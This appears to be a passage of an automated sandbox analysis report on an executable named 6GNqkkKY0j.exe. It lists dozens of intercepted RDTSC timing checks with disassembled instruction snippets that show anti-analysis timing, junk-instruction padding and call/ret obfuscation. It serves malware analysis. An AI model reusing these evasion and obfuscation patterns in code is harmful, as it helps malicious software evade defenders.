Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDFD7 second address: 4DE00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0FE0B8ED44h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F0FE0B8ED43h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DE00D second address: 4DE013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A7525 second address: 4A753A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A753A second address: 4A7544 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0FE14B0506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DE7AA second address: 4DE7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DE7B0 second address: 4DE7CD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0FE14B0506h 0x00000008 jmp 00007F0FE14B0513h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DEBD1 second address: 4DEBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DEE6D second address: 4DEE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4E23F5 second address: 4E2420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0FE0B8ED44h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4E2A47 second address: 4E2A67 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0FE14B0508h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0FE14B050Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EAFFB second address: 4EAFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB29B second address: 4EB2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB556 second address: 4EB55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB55C second address: 4EB562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB562 second address: 4EB566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB566 second address: 4EB56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EB56A second address: 4EB578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F0FE0B8ED36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC5F8 second address: 4EC604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC6BE second address: 4EC6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC6C4 second address: 4EC6E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 5E3EA8C6h 0x0000000f movzx edi, di 0x00000012 push E5F361F5h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC6E1 second address: 4EC6EB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0FE0B8ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC80F second address: 4EC815 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC815 second address: 4EC83F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0FE0B8ED38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F0FE0B8ED49h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4EC96A second address: 4EC96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED1FF second address: 4ED209 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED209 second address: 4ED223 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0FE14B0510h 0x00000008 jmp 00007F0FE14B050Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED223 second address: 4ED227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED227 second address: 4ED25A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0FE14B0514h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F0FE14B050Eh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED304 second address: 4ED308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED308 second address: 4ED31B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ED798 second address: 4ED79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A5A65 second address: 4A5A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0FE14B0506h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A5A88 second address: 4A5A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4AF904 second address: 4AF92A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F0FE14B0506h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0FE14B0516h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4AF92A second address: 4AF930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4AF930 second address: 4AF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4AF936 second address: 4AF93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F0931 second address: 4F0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F0935 second address: 4F0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE0B8ED3Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F0947 second address: 4F099B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0FE14B0508h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov esi, 73109ED1h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d sub esi, 2D6D459Eh 0x00000033 push eax 0x00000034 pushad 0x00000035 push ebx 0x00000036 jmp 00007F0FE14B050Eh 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F13DA second address: 4F1430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D20E2h] 0x0000000f push 00000000h 0x00000011 call 00007F0FE0B8ED48h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F0FE0B8ED38h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F1430 second address: 4F1434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F1434 second address: 4F143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F143A second address: 4F1447 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F238F second address: 4F2393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F2E2D second address: 4F2E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F2E32 second address: 4F2E3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0FE0B8ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F2E3C second address: 4F2E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0FE14B0508h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D2D09h], ecx 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c push ebx 0x0000002d adc di, A0A0h 0x00000032 pop edi 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 xor dword ptr [ebp+122D27DCh], edi 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F2E89 second address: 4F2E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F3578 second address: 4F357C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F357C second address: 4F358A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F358A second address: 4F3594 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0FE14B050Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F3594 second address: 4F35A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F6CE7 second address: 4F6D06 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE14B050Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0FE14B050Ch 0x00000013 jc 00007F0FE14B0506h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F35A0 second address: 4F35A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F6D06 second address: 4F6D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F6D0B second address: 4F6D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F6D11 second address: 4F6D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0FE14B0508h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+12447775h], esi 0x0000002a push esi 0x0000002b or dword ptr [ebp+1245993Fh], ecx 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F0FE14B0508h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push edi 0x0000004f pop edi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jnc 00007F0FE14B0514h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F6D84 second address: 4F6D99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F0FE0B8ED40h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FA52E second address: 4FA54F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0FE14B050Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F755D second address: 4F7561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F7561 second address: 4F757B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FBDDE second address: 4FBDE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F757B second address: 4F7597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F7597 second address: 4F759C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FDF1B second address: 4FDF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FDF1F second address: 4FDF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FDF25 second address: 4FDF2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FCE8D second address: 4FCE93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FE01E second address: 4FE03F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FE11A second address: 4FE11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 500037 second address: 50003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50003C second address: 5000C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0FE0B8ED38h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 or edi, dword ptr [ebp+122D29ECh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0FE0B8ED38h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 jmp 00007F0FE0B8ED42h 0x0000004d push 00000000h 0x0000004f xor edi, 780CA11Ch 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b jmp 00007F0FE0B8ED45h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5000C2 second address: 5000C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5000C7 second address: 5000D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4FF1B7 second address: 4FF272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push dword ptr fs:[00000000h] 0x0000000d jmp 00007F0FE14B0514h 0x00000012 jmp 00007F0FE14B050Ah 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e jmp 00007F0FE14B0515h 0x00000023 mov ebx, ecx 0x00000025 mov eax, dword ptr [ebp+122D0D39h] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F0FE14B0508h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+12454115h] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F0FE14B0508h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000017h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 stc 0x00000068 mov ebx, dword ptr [ebp+122D27D8h] 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push ebx 0x00000072 jmp 00007F0FE14B0517h 0x00000077 pop ebx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50027F second address: 500285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 500285 second address: 5002A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0FE14B0506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F0FE14B050Ah 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5002A3 second address: 5002A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 502213 second address: 502217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 504FF7 second address: 504FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
